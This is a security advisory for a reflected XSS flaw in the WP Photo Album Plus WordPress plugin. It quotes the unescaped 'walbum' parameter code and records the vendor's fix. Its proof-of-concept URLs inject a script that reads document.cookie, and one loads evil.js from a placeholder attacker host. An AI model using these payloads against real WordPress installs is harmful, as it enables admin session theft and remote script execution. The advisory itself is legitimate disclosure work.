$_GET['walbum'] is not escaped.
File: wp-photo-album-plus\wppa-widget-admin.php
if (isset($_GET['walbum'])) {
$walbum = wppa_walbum_sanitize($_GET['walbum']);
wppa_update_option('wppa_widget_album', $walbum);
}
<?php _e('Or Edit:', 'wppa'); ?><input type="text" name="wppa-widget-albums" id="wppa-was" value="<?php echo $wppa_opt['wppa_widget_album'] ?>" />XSS will be converted to lower case and cannot contain words: all-sep, all, sep, topten, clr.
File: wp-photo-album-plus\wppa-widget-functions.php
function wppa_walbum_sanitize( $walbum ) {
$result = strtolower( $walbum );
if ( strstr( $result, 'all-sep' ) ) $result = 'all-sep';
elseif ( strstr( $result, 'all' ) ) $result = 'all';
elseif ( strstr( $result, 'sep' ) ) $result = 'sep';
elseif ( strstr( $result, 'topten' ) ) $result = 'topten';
elseif ( strstr( $result, 'clr' ) ) $result = '';
else {
// Change multiple commas to one
while ( substr_count( $result, ',,' ) ) $result = str_replace( ',,', ',', $result );
// remove leading and trailing commas
$result = trim( $result, ',' );
}
return $result;
}Proof of Concept
Reflected XSS visible for admin:
http://wordpress-install/wp-admin/admin.php?page=wppa_photo_of_the_day&walbum="><script>alert(document.cookie);</script>Another version for IE 11.0.9600 based on WhiteHat Security - Bypassing Internet Explorer’s Anti-Cross Site Scripting Filter:
http://wordpress-install/wp-admin/admin.php?page=wppa_photo_of_the_day&walbum="><script src=http://attacker-url/evil.js></script>Timeline
- 04-11-2014: Discovered
- 04-11-2014: Vendor notified
- 05-11-2014: Version 5.4.18 released, issue resolved